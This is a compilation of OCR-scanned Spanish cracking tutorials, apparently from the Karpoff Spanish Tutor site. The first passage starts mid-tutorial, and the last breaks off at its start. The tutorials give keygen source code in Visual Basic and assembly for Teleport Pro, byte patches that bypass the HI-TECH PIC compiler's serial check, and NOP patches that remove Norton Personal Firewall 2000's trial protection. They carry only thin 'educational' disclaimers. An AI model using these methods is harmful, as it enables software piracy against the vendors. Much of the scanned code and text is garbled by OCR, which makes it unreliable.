"7" wN". Así pues el número bueno debe ser: ? 66decbad9 y el resultado que nos aparece és: 66DECBA9 


1725877161 "fpÉr". Como diría el Profesor X: ¡Este arroz ya se coció! 


Cálculo del serial correcto... 


Ya hemos descubierto nuestro serial number y podemos registrar el programa a nuestro nombre, pero en vista de la 
mala intención y la soberbia demostrada por el programador :o( creo que no es suficiente castigo. Así pues, vamos a 
programar un keygen, o mejor dos :0) 


Volveremos a cargar el programa en el Symbol Loader, y repetiremos el proceso anterior, poniendo esta vez: g 
426941. Cuando lleguemos a este punto, entraremos en el call. Tracearemos pacientemente con Fl10 para evitar la 
ejecución paso a paso del call 420940, que se repite varias veces durante el proceso y que no debemos seguir, si no 
queremos que el programador nos lleve de paseo. Llegaremos a un punto de interés: 


:004272F0 83F805 cmp eax, 00000005 
:004272F3 7304 3nb 004272F9 
:004272F5 33C0 xor eax, eax 
:004272F7 5F pop edi 

:004272F8 C3 ret 


aquí comprueba la longitud de nuestro nombre, y si es menor de cinco caracteres, nos manda por donde hemos 
venido. En caso contrario, continuamos: 


:004272F9 53 push ebx 

:004272FA 56 push esi 

:004272FB BEA4E4FE5D mov esi, 5DFEE4A4 
:00427300 33DB xor ebx, ebx 


antes de entrar en el bucle, carga su número de la suerte en ESI y pone EBX a O. Empieza el bucle que genera el 
serial válido: 


:00427302 85FF test edi, edi 
:00427304 7409 je 0042730F 
:00427306 57 push edi 

:00427307 E834560000 call 0042C940 


Otra vez el call 420940, pero ni caso. 


:0042730C 59 pop ecx 

:0042730D EBO02 jmp 00427311 
:0042730F 33C0 xor eax, eax 
:00427311 83C0FC add eax, FEFFFFEC 
:00427314 3BD8 cmp ebx, eax 
:00427316 730C jnb 00427324 


EAX contiene la longitud de nuestro nombre, se le resta 4 y se compara con EBX que en principio está a O, y sale del 
bucle si es igual o menor. A continuación veremos que se incrementa EBX, por lo que el bucle se repite tantas veces 
como caracteres tiene el nombre, menos 4. En nuestro caso, serán 9 veces. 


:00427318 33343B xor esi, dword ptr [ebx+edi] 


Aquí está. En este momento ESI contiene el valor 5SDFEE4A4 introducido anteriormente, y en la dirección señalada 
por EBX (009343E0), el valor 736F6143 que es el código ASCII de "soaC". Hemos visto que EBX vale 0, pero que 
se incrementa a cada ejecución del bucle, por lo que la segunda operación XOR se hará entre 2E9185E7 (resultado 
de la 1* operación) y 20736F61 (" soa") y así sucesivamente hasta 9 veces. La última operación se hará entre 
12BOAADD y 746E6174 ("tnat") y dará como resultado 66DECBAS9, en decimal: 1725877161, o sea, nuestro 
número válido :0) 


:0042731B F6C340 test bl, 40 
:0042731E 7401 je 00427321 
:00427320 43 inc ebx 
:00427321 43 inc ebx 
:00427322 EBDE jmp 00427302 


Si el nombre es muy largo, a partir de los 64 caracteres incrementa EBX dos veces en vez de una. Será para abreviar 
el proceso... 


Una vez que salimos del bucle, vemos: 


:00427324 8BC6 mov eax, esi 
:00427326 5E pop esi 
:00427327 5B pop ebx 
:00427328 5F pop edi 
:00427329 C3 ret 


Pone el número válido en EAX y vuelve para efectuar la comprobación y echarnos a los cocodrilos, si puede. 


Ya hemos terminado con el programa y ahora vamos a hacer el keygen. Haremos uno en Visual Basic y otro 
utilizando el Win32ASM. Esperemos que los números que den uno y otro sean los mismos :0) ... 


Keygen en Visual Basic... 


Para hacer nuestro keygen en Visual Basic, empezaremos creando un formulario con dos ventanas de texto (Textl 
para el nombre y Text2 para el serial) y dos botones (Command1 para "Generar" y Command2 para "Terminar”). El 
código del botón "Generar" debe ser más o menos así: 


Private Sub Command1l_Click() 
nombre = Textl.Text 
longitud = Len (nombre) 

If longitud < 5 Then 
extl.Text = "" 


ext2.Text = "¡Mínimo 5 caracteres!" 
Exit Sub 
End If 
For f = 1 To longitud -— 1 
Cadena = Hex(Asc(Mid(nombre, f, 1))) £ cadena 
Next f 
res = Val ("s«H5DFEE4A4") 
For f = 1 To longitud -— 4 
opl = Val("sH" £ Mid(cadena, Len(cadena) - (2 * f + 5), 8)) 
o0p2 = res 
res = opl Xor op2 
If f > 64 Then 
f=f+1 
End If 
Next f 
Text2.Text = Val (res) 
End Sub 


Y el del botón "Terminar": 


Private Sub Command2_Click() 
Unload Me 
End Sub 


Creo que está bastante claro y no hacen falta comentarios. 


Keygen en ASM... 


Para hacer nuestro keygen con Win32ASM, necesitaremos dos archivos. El de recursos: rsrc.rc y el del código: 
keygen.asm. 


En el primero de ellos, definiremos todos los elementos que aparecen en el programa, con sus atributos, posición y 
tamaño. Podría ser algo parecido a esto: 


tinclude "Amasm32Xincludel*resource.h" 
fdefine IDD_DIALOG 1000 


tdefine IDC_NAME 1001 
tdefine IDC_SERIAL 1002 
tdefine IDC_GEN 1003 
tdefine IDC_EXIT 1004 
tdefine IDC_STATIC -1 
keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,112,65 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Teleport Pro 1.29.1590" 

FONT 10, "MS Sans Serif" 


[o) 
(ña! 


EGIN 
TEXT "Nombre", IDC_STATIC,8,6,28,12 

TEXT "Serial",IDC_STATIC,8,26,28,12 

EDITTEXT IDC_NAME,36,6,67,12,ES_AUTOHSCROLL | ES_CENTER 
E EXT IDC_SERIAL,36,26,67,12, ES_CENTER | ES_READONLY 
PUSHBUTTON "Generar", IDC_GEN,8,45,40,14 
P U 


ON "Terminar", IDC_EXIT,63,45,40,14 


La primera definición (+tinclude...) es genérica y la ponemos para no tener que definir lo que no es propio de nuestro 
programa como: WS_CAPTION, ES_AUTOHSCROLL etc. 

Permitimos el scroll horizontal porque el texto del nombre puede ser largo. Para evitar la introducción de texto en la 
casilla del número ponemos el read only. Por lo demás, creo que más o menos se ve de qué va. 


El fichero del código podría ser algo así: 


.386 

.model flat,stdcall 

option casemap:none 

include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


«Const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_EXIT EQU 1004 


DlgFunc PROTO :DWORD, :DWORD, : DWORD, : DWORD 
Operacion PROTO 


.data 

nombre db 80 dup(0),0 

serial db 10 dup(0),0 

largo db 02 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 

Iconimage db "keygen",0 
minombre db "Caos reptante",0 
menosde5 db "¡Mínimo 5 caracteres!",0 
hInstance dd 0 

hIcon dd 0 

hWnd da 0 


. code 

start:invoke GetModuleHandle, NULL 
mov hInstance,eax 
invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, 1]Param: DWORD 


cet 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 


invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlgltemText,hDlg,IDC_NAME, ADDR minombre 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDl1g,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICK 
.1f ax==IDC_! 


D 


E 
¡al 
= 
¡al 


invoke SendMessage,hDlg,WM_CLOS 


.elseif ax==IDC_GEN 


p 


, 


0,0 


invoke GetDlglItemText,hDlg, IDC_NAME,ADDR 


invoke lstrlen,ADDR nombre 
mov edx,offíset largo 

mov dword ptr [edx],eax 
invoke Operacion 

.1f eax== 


nombre, 80 


invoke SetDlgltemText,hDlg,IDC_NAME, ADDR nada 
invoke SetDlglItemText,hDlg,IDC_SERIA 


.else 


,¡, ADDR menosde5 


invoke SetDlgltemText,hDlg, IDC_SERIA 
invoke SetDlgltemText,hDl1lg,IDC_NAME,ADDR nombre 


.endif 
ret 
.endif 
.endif 


.endif 


DlgFunc endp 


Operacion proc 


bucle: 


sigue: 


hexadec: 


espacios: 


mov edi,offset nombre 
invoke lstrlen, offset nombre 
.1f eax< 5 
mov eax,1l 
ret 
.endif 
add eax,-4 
xor ebx,ebx 
mov edx, DDFEE4A4h 
cmp ebx,eax 
jnb hexadec 
xor edx,dword ptr[editebx] 
test b1,40h 
je sigue 
inc ebx 
inc ebx 
jmp bucle 


mov esi, offset serial 
xor eax,eax 
mov byte ptr[esil,32 
.1f eax < 11 

inc eax 

inc esi 

jmp espacios 
.endif 
mov eax,edi 
dec esi 
mov eax, edx 
mov ecx,10 


,, ADDR serial 


otro: cmp eax,ecx 
jb fin 
xor edx,edx 
div ecx 
or dl,30h 
mov byte ptr[esi],dl 
dec esi 
jmp otro 
Lima or al,30h 
mov byte ptr[esil,al 
xor eax,eax 
ret 


Operacion endp 
end start 


El procedimiento DlgFunc es la base del programa y se ocupa de: 

1”- Condiciones iniciales (WM_INITDIALOG;: define el icono del programa y pone un nombre ("Caos reptante”) 
por defecto. 

2”- Comprueba si se ha cerrado el programa desde la barra superior (WM_CLOSE) 

3”- Comprueba si se ha pulsado un botón (WM_COMMAND - BN_CLICKED). Si ha sido el de Terminar 
(IDC_EXIT), pues eso, sale. Y si ha sido el de Generar ( IDC_GEN), comprueba la longitud del nombre, y ejecuta el 
procedimiento Operacion. Al terminar éste, si la longitud del nombre es igual o superior a cinco, nos escribe el serial 
correspondiente al nombre. 


El procedimiento Operacion calcula el número válido y llama a la subrutina hexadec que se ocupa de poner espacios 
en la casilla del serial number (para borrar un número que hubiéramos obtenido anteriormente, ya que si fuera más 
largo, el número resultante sería la superposición de ambos) y pasa el serial number obtenido, de hexadecimal a 
decimal, tras lo cual, vuelve al procedimiento principal. 


De hecho, si hacéis los dos archivos como los he hecho yo, y los compiláis, veréis que el programa resultante 
funciona correctamente. Pero como la programación en Assembler no es lo mío, estoy seguro de que alguien que 
sepa programar verá muchos defectos, que le agradecería me hiciera saber. 


Conclusión... 


¡¡Hemos conseguido que los dos keygens den el mismo resultado!! 


¿ Teleport Pro 1.23. ' Teleport Pro 1.23. 
A Tel Pro 1.29.1590 MIE Tel Pro 1.29.1590 MEE 
Nombre | Caos reptante Nombre Caos reptante 


Serial 1725877161 
Terminar | 


Debo mencionar que para hacer el programa en ASM me he documentado en trabajos de JoTaKe, el cual a su vez, se 
había basado en trabajos de MrCrimson. Así pues, mi reconocimiento para ambos. 


Serial 


Finalmente, tengo que recordaros que la finalidad de estos tutoriales no es la de permitir ahorrarse unas pesetillas 
(bueno... realmente no son unas pesetillas, son nada menos que 40 $), sino la de que nuestras neuronas hagan 
gimnasia, y que si queremos utilizar el programa habitualmente, debemos pagar con la sonrisa en los labios y el 
llanto en el corazón :“o( 


Ya sólo me queda saludar a los que habéis tenido la paciencia de llegar hasta aquí y despedirme hasta el próximo 
tutorial, si es que llega... 


Si queréis hacerme llegar alguna duda, sugerencia, elogio, crítica o corrección, mi dirección de e-mail es: 
caos_reptante hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: HI-TECH V7.85 

PROTECCION: Serial 

Objetivos ge SaE fruta en el key, y que los pobres disfrutemos del 
compilador. 

Descripcion: Compilador de C para todos los micros PIC. 

Dificultad: Novato. 

DOWNLOAD : http: //ww.hitech.com 

Herramientas: Softice, IDAPRO, HexWorshop 

CRACKER: Aftosa FECHA: 17/03/2001 


INTRODUCCION 


Este compilador de C de Hi-Tech, es el hermano mayor del famoso y de libre distribucion PIC-LITE. Es una 
versión que sólo soporta los procesadores PIC 16C87 y similares. 


Como exponente mayor permite programar todas las versiones de procesadores de la familia PIC, pero tiene 
el inconveniente que no es free. Lógicamente el costo de esta herramienta es muy accesible para empresas, 


pero no así para estudiantes y derivados. 


Es un programa de DOS, y usa como mecanismo de protección el pedido de una password que figura en la 
caja del CD cuando se lo compra. 


AL ATAKE 


Si se ejecuta el programa, después de algunos enter, aparece la pantalla en la que se piden el serial key y demás. 


Please enter the following information 
User name TO 


Company name 


Your serial number and installation key can be 


found on the reverse of the user manual title page 
Serial number 


Installation key 


Si completamos los datos y presionamos enter, aparece una pantalla donde se nos informa que no estamos autorizados a instalar 
este compilador, su aspecto es el siguiente: 


Invalid serial number or installation key 


Al llegar aquí se terminan las ilusiones de tener un copilador para C como la gente, para poder hacer proyectos con PIC. En este 
momento es cuando uno piensa como puedo hacer para instalarlo?, Uno ha escuchado sobre personas que la tienen atada, y que 
es un juego de chicos, pero lamentable (hasta ahora) no conocía a ninguno. Un dia en el lugar donde trabajo, una persona a la 
que le gusta Annibal Lexter me comento que estaba trabajando con herramientas de crack, mencionandome al Guru Karpoff, al 
SICE, y demas yerbas. Quede acelerado pensando que esta era la manera de ver cómo podía hacer que el cartel de "invalid serial 
number" fuera un mal sueño. 


Bueno después de esta introducción una manera novelesca, y sin dejar de agradecer a la gente que me ayudo , paso a explicar 
cómo hice para que la pantalla no apareciera más. 


Primero hay que desZipear el archivo pic785.exe en cualquier directorio de la PC, esto es porque como es autoejecutable, si se 
lo ejecuta se autoinstala, y no nos da la posibilidad de tener el archivo install.exe. para estudiarlo. 


Como aprendí de los tutoriales de Karpoff, abro install.exe con el Ida, (en este caso conviene porque es de DOS), y busco con el 
search text la palabra "Invalid" que es la que aparece en la pantalla que informa que no se puede instalar. Cabe aclarar que hay 
otra manera de buscar este String: es ir a Name en View y en listado buscar la etiqueta que sea mas parecida al string buscado; 


non 


por supuesto es conveniente que empiece con "a". 


De todos modos las dos maneras llevan al mismo lugar. 


File Edit Jump Search View Options Windows Help 
alu el-/ sel081""] <] 1x] =(+) 
q v[ av] 5] M] Kf + 7 


IDA View-A | 


"Enter activation key',0 
"Enter serial number and activation key',0 


"Please enter correct serial no. and installation k; 
"Installation key' ,0 


"Drive not ready',0 
"This package has already been installed by',0 


Esta ventana nos muestra el string que aparece en la pantalla en cuestión, más un data XREF a seg007:1056, si hacemos doble 
click en este solamente nos lleva al punto donde se define el mensaje en assembler. Como nosotros buscamos el código que 
llama a este puntero, la manera que encontré es buscar "1056" como string, (uso solamente 1056 porque estamos en DOS, donde 
no exite la memoria extendida), estó nos lleva al punto culminante de la cacería. 


5289h 


5349h 


La línea señalada corresponde al puntero de string de invalid Key. En este punto levantado la vista y llegando hasta el "jnz", nos 
damos cuenta que después de llamar a dos funciones se hace una comparación: si no da cero, se considera que el código 
ingresado es válido, si no se presenta el mesaje de inavlid key. 


Es fácil darse cuenta que hay que cambiar el salto condicional, para que salte si es cero. Como soy un principiante voy a detallar 
un modo que encontré en tutoriales para hacer esto. Las dos cosas que se necesitan para usar el hexWorshop, (que es la 
herramienta que se usa para editar el ejecutable), son la direccion del archivo donde está el salto y el hexadecimal que 
corresponde al asm jzn y jz. La dirección aparece en la barra de estado del IDA, (en el cuarto casillero desde la izquierda). El 
código se puede obtener a partir de tablas de referencia de asm, o también usar una utilidad del IDA muy potente, que se llama 
assemble y que está en el menú patch program dentro de edit. 


5289h 


seg001 : 2D05 


Assemble instruction xl 


Previous line: 
Address  :0x1079:0x2D05 


Instruction hz loc_79_2D3B| | 


Cancel | Help | 


Como se puede ver cambiamos el jnz a jz, y mantenemos la etiqueta del salto. Presionando enter aparece el código jz en vez de 
jnz. Pero todavía nos falta saber cuál es el hexadecimal del jz: para esto usamos dentro del menú patch program el menú edit 
byte, que muestra el código de la siguiente manera: 


5289h 


seg001 : 2D05 


Patch Bytes o x 


File offset : 0x8625 
Original value: 75 34 FF 36 28 2C B8 04 001€ B9 4953 51 94 0C 
Walues [73 34 FF 36 28 20 B8 04 001E B9 495351 94 0C y] 


Cancel | Help | 


Vemos que el 75 que corresponde al jnz ahora cambió al 74 que corresponde al jz. Solo resta ir al hexworshop y cambiarlos. 


Dentro del hex abrimos el archivo, y vamos al menú goto dentro de edit, donde cargamos el valor 8625 en hexadecimal. 
Presionamos enter y aparece la siguiente pantalla: 


ÍH Hex Workshop - [install.exe] 3 
[ Fle Edit Disk Options Tools Window Help 


EA A CANTE 100 60 /a|) 


Y | E 


[5 -«»S2 52 1 Ejn+-.7x mes 


00008624 34FF 20B8B 519A 900|.M4.6(., 
00008638 5810 5610 0404 2CFF |.6X..6V 
0000864€C JUEF 1094 FEJE ¡391 65... 62 


En la izquierda se indica la posición del offset. Seleccionado el byte en cuestión y haciendo click con el botón derecho aparece el 
pop-up, vamos a fill llenamos con 74 y presionamos enter: 


File Edit Disk Options Tools Wind Ow Help 
[ss l¿Beo|peyia [muss 10 
[5 


“ASP Al E A+ - ./ 2 [eo e e 


5 
1 


C Hex 


Number of bytes: [ 


( Dec 


Cancel | 
[7] 


Fill with the following hex byte: 


Fills the Current Selection 


Sólo nos resta salvar el archivo y listo. Ahora, al correr el install.exe aparece la siguiente pantalla de instalacion, que nos 
confirma que el serial number ahora no se tiene en cuenta. 


Installing HI-TECH C (Microchip PIC) Cross Compiler U7.85 


22% completed 


Don't forget to complete and post the registration card. 
If you didn't receive a registration card, contact HI-TECH 
or your supplier. You must register to get technical support 
and updates. 


La información suministrada aquí es solamente con propositos educativos. Si usted usa este soft con fines comerciales, por favor 
compre el compilador original a hi-tek. 
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Programa: Norton Personal Firewall 2000 


PROTECCION: Limitacion de Tiempo y Nag 
Muy buen y práctico Firewall para internet 


DOWNLOAD : ASA TE nES no sé, ya que lo he conseguido en un CD de Shareware. Pero se debe 
poder bajar de www.Norton.com 
Herramientas: — [sotrico, IDA , Editor Hexadecimal 


INTRODUCCION 


Crackeando Norton Personal Firewall 2000. Por Sorvats 


Hola, como les va crackers. Hoy elegiremos como víctima una de las 
herramientas más útiles para el web-surfer cuidadoso de hoy en día. Un 
firewall, y qué firewall... el de Norton. Al parecer, esta compañía, 
que empezó con antivirus, y aún con el mismo Norton commander, se ha 
empezado a interesar en la seguridad informática. 


Bueno dejémonos de cháchara y comencemos... 


Lo que me ineteresa de este tutorial es una protección comercial muy 
especial, usada por varias compañías de software en la red, para la 
distribución de sus programas shareware. Se llama Virtual Box, o más 


comúnmente llamada VBox. 


Lo que sabemos de esta protección es que tiene una protección de 
tiempo, por un chequeo desconocido (que lo hace bastante difícil), y 


una rutina antiSice, basada en SEH). 
Esto nos hará dibyujar un plan de ataque al programita, para ver que 


Carajo hace. Esto es lo que se me ocurrió a mí: 


1- Darle disassembly con IDA(porque encuentra todas las llamadas a 


funciones en DLLs, aún las que no están en el directorio del sistema). 


2- Correr el programa para ver que esté la rutina antiSice (porque 
esto lo decide el programador, y a veces no le ponen). Y de paso ver 


que structura tiene la llamada a la Nag screen 


3- Una vez comprobado todo lo anterior, procedemos a deshacernos dela 
NAG y de la protección, para hacer que el programa funcione como Dios 
manda. 


DISCLAMER 


e Cabe aclarar que toda la información incluída en este texto se 
aferra a su total objetivo educacional, debido a esto, el autor no 
puede hacerse cargo de los fines con que sea usada esta 
información. 


AL ATAKE 


LUZ Bueno ahora procedamos al punto 1, desensamblemos el archivo base de la aplicación, en 


este caso IAMAPP.exe. Parece que los programadores nos hubieran querido decir a nosotros los 
crackers donde empezar a buscar, porque todos los archivoz empiezan con lam y luego la 
descripción de que tiene adentro. Una vez desensamblado, ejecutemos el programa con Softice 
habilitado. Oh dios!!!! 

La nag aparece sin ningún problema!!!! 

¿Que clase estúpido pondría una VBox en su programa sin la rutina anti debugger? Después de 
esto, lo único que nos falta suponer que el archivo base no está empacado, y esta sesión de 
cracking se convertirá en un simple parche.... 


CAMARA Miremos al listado muerto de nuestro programa y que quieren que les diga... A mi 
parece bastante coherente el código, con llamadas a APIs y todo, un punto deentrada con la 
estructura más común... 

Hay que afirmar que el que protegió esto es un idiota, así, el VBox para lo único que 
sirve es para mostrarnos la fecha en que vencerá nuestro período de trial, y luego hará que 
el programa se termine... 


ACCION 


Así que pasemos al paso 3, la acción!!! 
Veamos, Cambiemos la fecha de nuestro computador para que sobrepase el tiempo de prueba. 
Luego iniciemos NPF y miremos a la NAG que nos muestra nuestro amigo. "Trial expired", y el 
botón de "Probar el programa" está deshabilitado. así quen hay dos opciones aquí, hacemos que 
la nag se vaya a la mierda y no aparezca más, o hacemos que el botón se habilite. Desde mi 
punto de vista, algún día voy a intentar la segunda, por causas de curiosidad, nunca he 
estado traceando dentro de una dll de Virtual Box, y me gustaría. Pero es este un tutorial 
para newbies y no quiero complicarles la existencia. Vamos a ver de donde carajo se llama a 
la DLL de VBox y eliminar esa llamada. Corremos el programa y ponemos "bpx DialogBoxParamaA" 
en Softlce. Luego apretamos el botón 'ENABLE', y estamos dentro de Softlce. En la función 
GetDialogBoxParamA. apretamos F12 para salir de la función, y como veremos aparece la NAG. 
Como solo podemos apretar el botón 'Quit' para salir, lo hacemos y nuevamente estamos en 


SoftlIce. Esta es la pantalla: 


PROT32 


015F:00442FAB FF1564F24900 CALL [USER32 !DialogBoxParamA] 
015F:00442FB1 8BFO MOV ESI,EAX 


015F:00442FB3 E8CDO10000 CALL 00443185 
015F:00442FB8 56 PUSH ESI 

015F:00442FB9 E80C000000 CALL 00442FCA 
015F:00442FBE 8325F0D34A0000 AND DWORD PTR [004AD3F0],00 
015F:00442FC5 59 POP ECX 

015F:00442FC6  5F POP EDI 

015F:00442FC7  5E POP ESI 

015F:00442FC8 5B POP EBX 

015F:00442FC9 C3 RET 

015F:00442FCA 837C2404FF CMP DWORD PTR [ESP+04],-01 
015F:00442FCF 7414 JZ 00442FE5 
015F:00442FD1 8370240401 CMP DWORD PTR [ESP+04],01 
015F:00442FD6 “7409 JZ 00442FE1 
015F:00442FD8 A1FO0D34A00 MOV EAX, [004AD3F0] 
015F:00442FDD FF502C CALL [EAX+2C] 
015F:00442FE0 C3 RET 

015F:00442FE1  6A09 PUSH 09 

015F:00442FE3 58 POP EAX 

015F:00442FE4 C3 RET 

015F:00442FE5 E804000000 CALL 00442FEE 
015F:00442FEA 6A04 PUSH 04 

015F:00442FEC 58 POP EAX 

015F:00442FED C3 RET 

015F:00442FEE B888B94900 MOV EAX,0049B988 
015F:00442FF3 E88CA00400 CALL 0048D084 


VBOXS430!PREVIEW+1FAB 


Veremos que estamos dentro de VBOXS430.dl1. Entonces, lo que vamos a hacer es apretar F12 
hasta que veamos salimos de ella, y miramos en donde estamos. Esto es algo parecido a tracear 
hacia atrás, ya que por cada vez que apretamos F12, estamos saiendo de una función. Así que 
después de un par de veces de seguir cayendo en el mismo lugar, vemos que estamos en otro 
lado... Esta vez abajo dice N32USERL, podemos sopechar que es un dll, o un ejecutables, así 
que lo que haremos será buscar el archivo de nombre n32userl, lo encuentra como n32userl.dll, 
en el mismo directorio que jamapp.exe. Lo qu yo hice, para poder identificar el código, es 
cargar todas las funciones exportadas por estas dos dlls con el Softice Symbol loader. Así 


podría ver que funciones se llaman en el ejecutable y en el n32userl.dl1l 


Luego, hacemos lo mismo que hicimos antes, solo que ahora veremos los nombres reales de las 
funciones que se llaman, a excepción de los dela VBOXS430.DLL, que está empacada y los 


nombres aparecen en forma de números ordinales, como por ejemplo ORDO002. 


Una vez que hicimos todo lo que debimos, deberíamos estar en la pantalla del Sice que nos 


muestra lo siguiente: 


N32USERL!N32User_GetUserState+002D PROT32 
015F:0043117D  E8DA000000 CALL vboxs430!0RD_0002 
015F:00431182 85C0 TEST EAX, EAX 
015F:00431184 7558 JNZ 004311DE 
015F:00431186 8B442404 MOV EAX, [ESP+04] 
015F:0043118A 3D147D0000 CMP EAX, 00007D14 
015F:0043118F 740E JZ 0043119F 
015F:00431191  3DC0C40000 CMP EAX, 0000C4C0 
015F:00431196 7407 JZ 0043119F 
015F:00431198 3D58E50000 CMP EAX, 0000E558 
015F:0043119D 7509 JNZ 004311A8 
015F:0043119F  E8B2000000 CALL vboxs430!0RD_0004 
015F:004311A4 8B442404 MOV EAX, [ESP+04] 
015F:004311A8 3D147D0000 CMP EAX, 00007D14 


015F:004311AD 741D JZ 004311cc 
015F:004311AF  3DC0C40000 CMP EAX, 0000C4C0 
015F:004311B4 7416 JZ 004311cc 
015F:004311B6 8B942414010000 MOV EDX, [ESP+00000114] 
015F:004311BD 33C9 XOR ECX, ECX 
015F:004311BF  3D58E50000 CMP EAX,0000E558 
015F:004311C4 0F94C1 SETZ CL 

015F:004311C7 41 INC ECX 

015F:004311C8  890A MOV [EDX] ,ECX 
015F:004311CA EBOD JMP 004311D9 
015F:004311CC”— 8B842414010000 MOV EAX, [ESP+00000114] 
015F:004311D3 C70000000000 MOV DWORD PTR [EAX],00000000 
015F:004311D9 BE01000000 MOV ESI,00000001 
015F:004311DE E86D000000 CALL vboxs430!0RD_0005 


N32USERL! .text+017D 


Como podremos ver, ahora el texto verde de arriba nos indica en que función de N32USERL.DLL 
estamos. entonces, ahora deberemos apretar F12 nuevamente para ver desde donde llamaron a 


esta funcioncita dentro del dll. 


Apretamos Y..... ALELUYA!!!!!! 
Allí está, ahí lo vemos, el nombre de nuestro ejecutable, esta es la raíz de todo, así que 


aquí será donde parcharemos el programa... 
fijense en cualquiera de las direcciones que vean y búsquenlas en IDA, porque ya me estoy 


hartando de entrar al Sice para sacar las pantallitas... 


este es el código, extraído del IDA: 


push eax 

Call 3j_N32User_GetUserState 

cmp [ebp+var_4], esi 

jnz short loc_405DB0<-- Este salto es el que nos caga 

mov eax, [ebp+arg_0] 

mov [eax], esi 

mov eax, [ebp+arg_4] 

and dword ptr [eax], 0 

jmp short loc_405DD1<--Con este JMP nos vamos de la función 
loc_405DBO0: 

xXOor eax, eax 

cmp [ebp+var_4], eax 

jnz short loc_405DC7 

mov eax, [ebp+arg_0] 

mov [eax], esi 

mov eax, [ebp+arg_4] 

mov dword ptr [eax], 1Eh 

jmp short loc_405DD1 
loc_405DC7: 

mov ecx, [ebp+arg_0] 

mov [ecx], eax 

mov ecx, [ebp+arg_4] 

mov [ecx], eax 


loc_405DD1: 


pop esi 
leave 


retn 


sub_405D7B endp 


veremos que hay un par de saltos que dependen de lo que la función returne, así que lo que 
vaqmos a hacer es ver a donde va a parar cuando ya se nos acabó el tiempo, podemosw ver que 
lo que hace la función cuando no estamos registrados es retornar un valor de [ebp+04] igual a 
ESI, lo que nos lleva a que el JNZ que está consecutivo no se ejecute, y directamente llegue 
al jmp y se vaya de la función. Así que lo que haremos es obligarlo a saltar en esa 
dirección. Para esto, en un editor hexadecimal, yo utilizo HIEW para ver el código o 
HexWorkshop para editar datos, iremos al offset que IDA nos diga que esta dirección es, en 
este Caso, el JNZ está en el offset 00005DA1l, así que vayamos a ese offset en el eitor y 


cambiemos el 75 por EB esto es, estamos cambiando un JNZ por un JMP. 
Después cerremos el editor y guardemos los cambios, luego ejecutemos el programa yt veamos. 


Apretemos el botón 'Enable' y veamos.... 
Aparece la Nag, apretamos 'Quit' y..... 


Sí!!! El programa se habilita y aparece en el Systray 

Ahora, lo que tenemos que hacer es eliminar la NAG del camino, ya que a pesar de que hemos 

hecho que se habilitara el progrrama, la NAG sigue siendo un obstáculo para nuestro trabajo. 
Para hacer esdto, lo que haremos es transformar la sección de código que llama a la función 

en el dll en NOPs, cuyo valor hexadecimal en el archivo es 90, así que transformaremos desde 
el offset 00005D98 al 00005DAO0 en nops, es decir, convertiremos cada byte dentro de ese 


rango en uno que tenga el valor 90h. 


00405D98 push eax 
00405D99 call j_N32User_GetUserState 
00405D9E cmp [ebp+var_4], esi 


Este será el código que transformaremos en NOPs, debemos eliminar el push eax para que la 
pila quede estable, y el cmp [ebp+04] para que también queden estables la banderas 


Una vex que hacemos esto, guardamos los cambios y probamos el programa, apretamos el botón 
para habilitarlo y ...,BINGO!!!! 

la nag ya no aparece y el programa se habilita, no hay rastros de una Virtual Box en nuestro 
programilla... 


Hemos crackeado el Norton Personal Firewall 2000 


ADIÓS Y MUCHAS GRACIAS POR TOMARSE EL TIEMPO PARA LEER ESTE TUTORIAL. Si quieren mandar 
alguna sugerencia, consejos, erratas, preguntas, dudas, o agradecimiento, por favor háganlo 


a: 


oktogen (at) phreaker (dot) net 


[Solo reemplazen (at) por una Q y (dot) por un punto] 


Adios, hasta la próxima. 


Me hago llamar Sorvats. 
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CPU Indicator 1.2 


KuaTo_ThoR 
INTRODUCCION 


Un Saludo a Todos amigos. En un principio este tutorial era para la compañías PY Software, para todos sus 
programas, pero salvo este el resto se basan en códigos de registro, muy fáciles de conseguir. Por tanto, nos 
centraremos en este programa CPU Indicator, que tiene una protección comercial que nunca había visto, y que es 
bastante curiosa. Aunque como podremos ver no es nada del otro mundo. 


En la web www.soft-trade.com , creo que podéis encontrar más programas con esta protección, para los que 
quieran practicar un poco más ;-) 


AL ATAKE 


PROTECCIÓN VTCyberPack 


El programa la verdad es que tampoco es de mucha utilidad, creo yo, por eso me sorprendio que llevase una protección 


comercial. 


Ejecutamos el programa y nos aparece la siguiente ventana: 


Soft-Trade 


Try.Rent.Buy. 


Welcome to Soft: Trade! Ñ 


Soft-Trade is focused on giving customers more options when it Pe 
comes to buying software. With our unique service, you can soft-trade 
try, rent, and buy your favorite applications on the Internet... ===> 


All from a single source. 


To activate this application for your use, simply click on the 
Try, Rent, or Buy buttons to the right. We will then take you through 


the easy process of "unlocking" this program. z e Buy | 
| ¿AE 


Soft-Trade .com 


Todas las opciones de compra, alquiler y demás, son a partir de internet, no hay por donde meterle el código, mmm... El trial 
es de sólo cinco dias. Yo ya llevo dos, jejeje. Si damos al botón rectangular que pone soft-trade, veremos que aparece: 


About this package 


' YTCyberPak 2.4.2.4 
r Copyright € 1998-2000 ViaTech Inc. 


soft-trade” This Try-and-Buy Media package has been 
prepared by Xilicon, Inc. using eLicense System (TM) technology 
from WiaTech, Inc. 


Package presentation and eLicense System are 
